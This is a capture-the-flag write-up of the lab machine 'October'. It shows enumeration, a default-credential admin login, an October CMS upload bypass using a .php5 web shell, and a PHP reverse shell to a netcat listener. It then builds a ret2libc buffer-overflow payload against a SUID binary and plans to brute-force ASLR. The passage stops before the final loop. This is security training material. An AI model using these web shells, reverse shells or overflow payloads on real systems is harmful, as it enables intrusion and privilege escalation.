I"¨<h1 id="enumeration">Enumeration</h1>
<h2 id="nmap">Nmap</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-sVC</span> <span class="nt">--min-rate</span> 1000 <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-oN</span> nmap.out
PORT   STATE SERVICE   VERSION
22/tcp open  ssh       OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 <span class="o">(</span>DSA<span class="o">)</span>
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 <span class="o">(</span>RSA<span class="o">)</span>
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  ssl/http?
| http-methods:
|_  Potentially risky methods: PUT PATCH DELETE
|_http-title: October CMS - Vanilla
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="http">HTTP</h2>
<p>Whatweb or wapplyzer shows October CMS running:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>whatweb 10.10.10.16
http://10.10.10.16 <span class="o">[</span>200 OK] Apache[2.4.7], Cookies[october_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 <span class="o">(</span>Ubuntu<span class="o">)]</span>, HttpOnly[october_session], IP[10.10.10.16], Meta-Author[October CMS], PHP[5.5.9-1ubuntu4.21], Script, Title[October CMS - Vanilla], X-Powered-By[PHP/5.5.9-1ubuntu4.21]
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Directory brute-forcing:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>ffuf <span class="nt">-u</span> http://10.10.10.16/FUZZ <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive &lt;3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.16/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

forum                   [Status: 200, Size: 9588, Words: 5018, Lines: 217]
blog                    [Status: 200, Size: 4253, Words: 1470, Lines: 104]
themes                  [Status: 301, Size: 310, Words: 20, Lines: 10]
modules                 [Status: 301, Size: 311, Words: 20, Lines: 10]
account                 [Status: 200, Size: 5090, Words: 1573, Lines: 146]
tests                   [Status: 301, Size: 309, Words: 20, Lines: 10]
storage                 [Status: 301, Size: 311, Words: 20, Lines: 10]
plugins                 [Status: 301, Size: 311, Words: 20, Lines: 10]
backend                 [Status: 302, Size: 400, Words: 60, Lines: 12]
Blog                    [Status: 200, Size: 4253, Words: 1470, Lines: 104]
Forum                   [Status: 200, Size: 9588, Words: 5018, Lines: 217]
error                   [Status: 200, Size: 3343, Words: 1043, Lines: 78]
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>Accessing /backend gives us <code class="language-plaintext highlighter-rouge">/backend/backend/auth/signin</code> which gives us a username and password field for admin.
Trying admin:admin works!</p>
<h1 id="foothold">Foothold</h1>
<p>There‚Äôs a media option where we can upload any files.
Searching for exploits:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>searchsploit october cms
<span class="nt">--------------------------------------------------------------------------</span> <span class="nt">----------------------</span>
 Exploit Title                                                            |  Path
<span class="nt">--------------------------------------------------------------------------</span> <span class="nt">----------------------</span>
October CMS - Upload Protection Bypass Code Execution <span class="o">(</span>Metasploit<span class="o">)</span>        | php/remote/47376.rb
October CMS 1.0.412 - Multiple Vulnerabilities                            | php/webapps/41936.txt
October CMS &lt; 1.0.431 - Cross-Site Scripting                              | php/webapps/44144.txt
October CMS Build 465 - Arbitrary File Read Exploit <span class="o">(</span>Authenticated<span class="o">)</span>       | php/webapps/49045.sh
October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting           | php/webapps/44546.txt
OctoberCMS 1.0.425 <span class="o">(</span>Build 425<span class="o">)</span> - Cross-Site Scripting                     | php/webapps/42978.txt
OctoberCMS 1.0.426 <span class="o">(</span>Build 426<span class="o">)</span> - Cross-Site Request Forgery               | php/webapps/43106.txt
<span class="nt">--------------------------------------------------------------------------</span> <span class="nt">----------------------</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>There‚Äôs a multiple vulnerabilities .txt file which mentions php upload protection bypass with .php5 extensions as they aren‚Äôt blocked.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>searchsploit php/webapps/41936.txt <span class="nt">-x</span>
1. PHP upload protection bypass
<span class="nt">-------------------------------</span>

Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen <span class="k">in </span>octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions<span class="o">()</span><span class="nb">.</span>

<span class="o">====================</span> <span class="nb">source </span>start <span class="o">========================</span>
106 &lt;?php
107 protected <span class="k">function </span>blockedExtensions<span class="o">()</span>
108 <span class="o">{</span>
109         <span class="k">return</span> <span class="o">[</span>
110                 // redacted
111                 <span class="s1">'php'</span>,
112                 <span class="s1">'php3'</span>,
113                 <span class="s1">'php4'</span>,
114                 <span class="s1">'phtml'</span>,
115                 // redacted
116         <span class="o">]</span><span class="p">;</span>
117 <span class="o">}</span>
<span class="o">====================</span>  <span class="nb">source </span>end  <span class="o">========================</span>

We can easily bypass file upload restriction on those systems by using an
alternative extension, e.g <span class="k">if </span>we upload sh.php5 on the server:

<span class="o">====================</span> <span class="nb">source </span>start <span class="o">========================</span>
&lt;?php <span class="nv">$_REQUEST</span><span class="o">[</span><span class="s1">'x'</span><span class="o">](</span><span class="nv">$_REQUEST</span><span class="o">[</span><span class="s1">'c'</span><span class="o">])</span><span class="p">;</span>
<span class="o">====================</span>  <span class="nb">source </span>end  <span class="o">========================</span>

Code can be execute by making a following request:
http://victim.site/storage/app/media/sh.php5?x<span class="o">=</span>system&amp;c<span class="o">=</span><span class="nb">pwd</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Uploading pentestmonkey php reverse shell, accessing it at <code class="language-plaintext highlighter-rouge">/storage/app/media/phprev.php5</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lnvp</span> 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.16 53438
Linux october 4.4.0-78-generic <span class="c">#99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux</span>
 12:19:49 up  1:58,  0 <span class="nb">users</span>,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
<span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1304<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
www-data@october:/<span class="err">$</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="privesc">Privesc</h1>
<p>Checking for SUIDs gives <code class="language-plaintext highlighter-rouge">/usr/local/bin/ovrflw</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td> --><td class="rouge-code"><pre>www-data@october:/home/harry<span class="nv">$ </span>find / <span class="nt">-type</span> f <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
/bin/umount
/bin/ping
/bin/fusermount
/bin/su
/bin/ping6
/bin/mount
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/chsh
/usr/bin/at
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/local/bin/ovrflw
</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="protections">Protections</h2>
<p>ASLR is running on the host:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>www-data@october<span class="nv">$ </span><span class="nb">cat</span> /proc/sys/kernel/randomize_va_space
2
</pre></td></tr></tbody></table></code></pre></div></div>
<p>You can confirm that by checking the libc address in every run using <code class="language-plaintext highlighter-rouge">ldd</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>www-data@october<span class="nv">$ </span>ldd /usr/local/bin/ovrflw | <span class="nb">grep </span>libc
        libc.so.6 <span class="o">=&gt;</span> /lib/i386-linux-gnu/libc.so.6 <span class="o">(</span>0xb7622000<span class="o">)</span>
www-data@october<span class="nv">$ </span>ldd /usr/local/bin/ovrflw | <span class="nb">grep </span>libc
        libc.so.6 <span class="o">=&gt;</span> /lib/i386-linux-gnu/libc.so.6 <span class="o">(</span>0xb7564000<span class="o">)</span>
www-data@october<span class="nv">$ </span>ldd /usr/local/bin/ovrflw | <span class="nb">grep </span>libc
        libc.so.6 <span class="o">=&gt;</span> /lib/i386-linux-gnu/libc.so.6 <span class="o">(</span>0xb75ac000<span class="o">)</span>
www-data@october<span class="nv">$ </span>ldd /usr/local/bin/ovrflw | <span class="nb">grep </span>libc
        libc.so.6 <span class="o">=&gt;</span> /lib/i386-linux-gnu/libc.so.6 <span class="o">(</span>0xb75de000<span class="o">)</span> 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Even if the ASLR in on, the libc address is only chaning from 0xb7500000 to 0xb76ff000.</p>

<p>5 -&gt; 6 gives 1 bit and 00-&gt;ff gives 8 bits which means only 9 bits are changing everytime.</p>

<p>2^9=512, which means we have 1 in 512 chance of guessing the right address or 1 - (511/512)^1 = 0.2% chance of success.</p>

<p>But if I try for like 1000 times:  1 - (511/512)^1000 = 85.84% chance of success.</p>

<p>This gets to 99.99% if I try for something like 5000 times.</p>

<p>Looking for additional protections:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>checksec ovrflw
<span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/root/HTB/October/privesc/ovrflw'</span>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span class="o">(</span>0x8048000<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>NX means that I can‚Äôt run shellcode from the stack, which is where I can write.</p>
<h2 id="finding-offset">Finding offset</h2>
<p>Creating a pattern</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>pattern_create.rb <span class="nt">-l</span> 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Finding the RIP address</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>dmesg | <span class="nb">tail</span> <span class="nt">-n</span> 2
<span class="o">[</span>153611.455267] ovrflw[225760]: segfault at 64413764 ip 0000000064413764 sp 00000000ffc8a040 error 14 <span class="k">in </span>libc-2.31.so[f7d92000+1d000]
<span class="o">[</span>153611.455276] Code: Unable to access opcode bytes at RIP 0x6441373a.
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Finding the offset</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>pattern_offset.rb <span class="nt">-q</span> 0x6441373a
<span class="o">[</span><span class="k">*</span><span class="o">]</span> No exact matches, looking <span class="k">for </span>likely candidates...
<span class="o">[</span>+] Possible match at offset 112 <span class="o">(</span>adjusted <span class="o">[</span> little-endian: <span class="nt">-42</span> | big-endian: 652758 <span class="o">]</span> <span class="o">)</span> byte offset 0
</pre></td></tr></tbody></table></code></pre></div></div>

<p>OR</p>
<h3 id="using-gdb-peda">Using gdb-peda</h3>
<p>Creating a pattern</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>gdb <span class="nt">-q</span> ./ovrflw
Reading symbols from ./ovrflw...
<span class="o">(</span>No debugging symbols found <span class="k">in</span> ./ovrflw<span class="o">)</span>
gdb-peda<span class="nv">$ </span>pattern_create 150
<span class="s1">'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Finding the RIP address</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td> --><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>run <span class="s1">'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'</span>
Starting program: /root/HTB/October/privesc/ovrflw <span class="s1">'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'</span>

Program received signal SIGSEGV, Segmentation fault.
<span class="o">[</span><span class="nt">----------------------------------registers-----------------------------------</span><span class="o">]</span>
EAX: 0x0
EBX: 0x0
ECX: 0xffffd400 <span class="o">(</span><span class="s2">"QAAmAARAAoAA"</span><span class="o">)</span>
EDX: 0xffffd126 <span class="o">(</span><span class="s2">"QAAmAARAAoAA"</span><span class="o">)</span>
ESI: 0xf7fa1000 <span class="nt">--</span><span class="o">&gt;</span> 0x1e4d6c
EDI: 0xf7fa1000 <span class="nt">--</span><span class="o">&gt;</span> 0x1e4d6c
EBP: 0x6941414d <span class="o">(</span><span class="s1">'MAAi'</span><span class="o">)</span>
ESP: 0xffffd110 <span class="o">(</span><span class="s2">"ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA"</span><span class="o">)</span>
EIP: 0x41384141 <span class="o">(</span><span class="s1">'AA8A'</span><span class="o">)</span>
EFLAGS: 0x10202 <span class="o">(</span>carry parity adjust zero sign <span class="nb">trap </span>INTERRUPT direction overflow<span class="o">)</span>
<span class="o">[</span><span class="nt">-------------------------------------code-------------------------------------</span><span class="o">]</span>
Invalid <span class="nv">$PC</span> address: 0x41384141
<span class="o">[</span><span class="nt">------------------------------------stack-------------------------------------</span><span class="o">]</span>
0000| 0xffffd110 <span class="o">(</span><span class="s2">"ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA"</span><span class="o">)</span>
0004| 0xffffd114 <span class="o">(</span><span class="s2">"jAA9AAOAAkAAPAAlAAQAAmAARAAoAA"</span><span class="o">)</span>
0008| 0xffffd118 <span class="o">(</span><span class="s2">"AAOAAkAAPAAlAAQAAmAARAAoAA"</span><span class="o">)</span>
0012| 0xffffd11c <span class="o">(</span><span class="s2">"AkAAPAAlAAQAAmAARAAoAA"</span><span class="o">)</span>
0016| 0xffffd120 <span class="o">(</span><span class="s2">"PAAlAAQAAmAARAAoAA"</span><span class="o">)</span>
0020| 0xffffd124 <span class="o">(</span><span class="s2">"AAQAAmAARAAoAA"</span><span class="o">)</span>
0024| 0xffffd128 <span class="o">(</span><span class="s2">"AmAARAAoAA"</span><span class="o">)</span>
0028| 0xffffd12c <span class="o">(</span><span class="s2">"RAAoAA"</span><span class="o">)</span>
<span class="o">[</span><span class="nt">------------------------------------------------------------------------------</span><span class="o">]</span>
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41384141 <span class="k">in</span> ?? <span class="o">()</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Finding the offset</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>pattern_offset AA8A
AA8A found at offset: 112
gdb-peda<span class="nv">$ </span>pattern_offset 0x41384141
1094205761 found at offset: 112
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Confirming the offset</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td> --><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>run <span class="sb">`</span>python3 <span class="nt">-c</span> <span class="s1">'print("A"*112 + "BBBB")'</span><span class="sb">`</span>
Starting program: /root/HTB/October/privesc/ovrflw <span class="sb">`</span>python3 <span class="nt">-c</span> <span class="s1">'print("A"*112 + "BBBB")'</span><span class="sb">`</span>

Program received signal SIGSEGV, Segmentation fault.
<span class="o">[</span><span class="nt">----------------------------------registers-----------------------------------</span><span class="o">]</span>
EAX: 0x0
EBX: 0x0
ECX: 0xffffd400 <span class="o">(</span><span class="s2">"AAAAAAAABBBB"</span><span class="o">)</span>
EDX: 0xffffd124 <span class="o">(</span><span class="s2">"AAAAAAAABBBB"</span><span class="o">)</span>
ESI: 0xf7fa1000 <span class="nt">--</span><span class="o">&gt;</span> 0x1e4d6c
EDI: 0xf7fa1000 <span class="nt">--</span><span class="o">&gt;</span> 0x1e4d6c
EBP: 0x41414141 <span class="o">(</span><span class="s1">'AAAA'</span><span class="o">)</span>
ESP: 0xffffd130 <span class="nt">--</span><span class="o">&gt;</span> 0x0
EIP: 0x42424242 <span class="o">(</span><span class="s1">'BBBB'</span><span class="o">)</span>
EFLAGS: 0x10202 <span class="o">(</span>carry parity adjust zero sign <span class="nb">trap </span>INTERRUPT direction overflow<span class="o">)</span>
<span class="o">[</span><span class="nt">-------------------------------------code-------------------------------------</span><span class="o">]</span>
Invalid <span class="nv">$PC</span> address: 0x42424242
<span class="o">[</span><span class="nt">------------------------------------stack-------------------------------------</span><span class="o">]</span>
0000| 0xffffd130 <span class="nt">--</span><span class="o">&gt;</span> 0x0
0004| 0xffffd134 <span class="nt">--</span><span class="o">&gt;</span> 0xffffd1d4 <span class="nt">--</span><span class="o">&gt;</span> 0xffffd377 <span class="o">(</span><span class="s2">"/root/HTB/October/privesc/ovrflw"</span><span class="o">)</span>
0008| 0xffffd138 <span class="nt">--</span><span class="o">&gt;</span> 0xffffd1e0 <span class="nt">--</span><span class="o">&gt;</span> 0xffffd40d <span class="o">(</span><span class="s2">"SHELL=/bin/bash"</span><span class="o">)</span>
0012| 0xffffd13c <span class="nt">--</span><span class="o">&gt;</span> 0xffffd164 <span class="nt">--</span><span class="o">&gt;</span> 0x0
0016| 0xffffd140 <span class="nt">--</span><span class="o">&gt;</span> 0xffffd174 <span class="nt">--</span><span class="o">&gt;</span> 0x15942f77
0020| 0xffffd144 <span class="nt">--</span><span class="o">&gt;</span> 0xf7ffdb40 <span class="nt">--</span><span class="o">&gt;</span> 0xf7ffdae0 <span class="nt">--</span><span class="o">&gt;</span> 0xf7fca3e0 <span class="nt">--</span><span class="o">&gt;</span> 0xf7ffd980 <span class="nt">--</span><span class="o">&gt;</span> 0x0
0024| 0xffffd148 <span class="nt">--</span><span class="o">&gt;</span> 0xf7fca410 <span class="nt">--</span><span class="o">&gt;</span> 0x804828a <span class="o">(</span><span class="s2">"GLIBC_2.0"</span><span class="o">)</span>
0028| 0xffffd14c <span class="nt">--</span><span class="o">&gt;</span> 0xf7fa1000 <span class="nt">--</span><span class="o">&gt;</span> 0x1e4d6c
<span class="o">[</span><span class="nt">------------------------------------------------------------------------------</span><span class="o">]</span>
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 <span class="k">in</span> ?? <span class="o">()</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="bypass-nx-stackdep-with-retn-to-libc">Bypass NX-Stack(DEP) with Retn to libc</h2>
<p><a href="https://css.csail.mit.edu/6.858/2011/readings/return-to-libc.pdf">https://css.csail.mit.edu/6.858/2011/readings/return-to-libc.pdf</a>
Returning to libc is a method of exploiting a buffer overflow on a system that has a non-executable stack, it is very similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can control. However since no executable code is allowed on the stack we can‚Äôt just tag in shellcode.</p>

<p>This is the reason we use the return into libc trick and utilize a function provided by the library. We still overwrite the return address with one of a function in libc, pass it the correct arguments and have that execute for us. Since these functions do not reside on the stack, we can bypass the stack protection and execute code.</p>

<p>We know the buffer length, need to find the address of a library function that we want to execute.</p>

<p>Finding address of libc with <code class="language-plaintext highlighter-rouge">ldd</code>:</p>
<blockquote>
  <p><em>‚Äúldd prints the shared objects (shared libraries) required by each program or shared object specified on the command line.‚Äù</em></p>
  <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>www-data@october:<span class="nv">$ </span>ldd /usr/local/bin/ovrflw | <span class="nb">grep </span>libc
        libc.so.6 <span class="o">=&gt;</span> /lib/i386-linux-gnu/libc.so.6 <span class="o">(</span>0xb757e000<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div>  </div>
</blockquote>

<p>Getting offsets for system, exit and /bin/sh with <code class="language-plaintext highlighter-rouge">readelf</code>:</p>
<blockquote>
  <p><em>‚Äúreadelf displays information about one or more ELF format object files.‚Äù</em></p>
  <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>www-data@october<span class="nv">$ </span>readelf <span class="nt">-s</span> /lib/i386-linux-gnu/libc.so.6 | <span class="nb">grep</span> <span class="nt">-e</span> <span class="s2">"system@@"</span> <span class="nt">-e</span> <span class="s2">"exit@@"</span>
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 <span class="nb">exit</span>@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
</pre></td></tr></tbody></table></code></pre></div>  </div>
</blockquote>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>www-data@october<span class="nv">$ </span>strings <span class="nt">-at</span> x /lib/i386-linux-gnu/libc.so.6 | <span class="nb">grep</span> <span class="s2">"/bin/sh"</span>
 162bac /bin/sh
</pre></td></tr></tbody></table></code></pre></div></div>
<p>and for this libc base (which is right for 1/512 times)</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>system  address <span class="o">=</span> libc address + system  offset <span class="k">in </span>libc
				<span class="o">=</span> 0xb757e000 + 0x00040310
				<span class="o">=</span> 0xb75be310
<span class="nb">exit    </span>address <span class="o">=</span> libc address + <span class="nb">exit    </span>offset <span class="k">in </span>libc
				<span class="o">=</span> 0xb757e000 + 0x00033260
				<span class="o">=</span> 0xb75b1260
/bin/sh address <span class="o">=</span> libc address + /bin/sh offset <span class="k">in </span>libc
				<span class="o">=</span> 0xb757e000 + 0x162bac
				<span class="o">=</span> 0xb76e0bac
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Buffer overflow goes: JUNK + SYSTEM (overwrite ret address) + EXIT (add next return address) + ‚Äú/bin/sh‚Äù (arguments).</p>
<h2 id="exploit">Exploit</h2>
<p>If ASLR weren‚Äôt enabled, I could just do this:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>/usr/local/bin/ovrflw <span class="si">$(</span>python <span class="nt">-c</span> <span class="s1">'print "\x90"*112 + "\x10\xe3\x5b\xb7" + "\x60\x12\x5b\xb7" + "\xac\x0b\x6e\xb7"'</span><span class="si">)</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Because ASLR is enabled, I can simple run an infinite loop, to run this and there‚Äôs 99.99% chance of popping a shell in 5000 tries.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
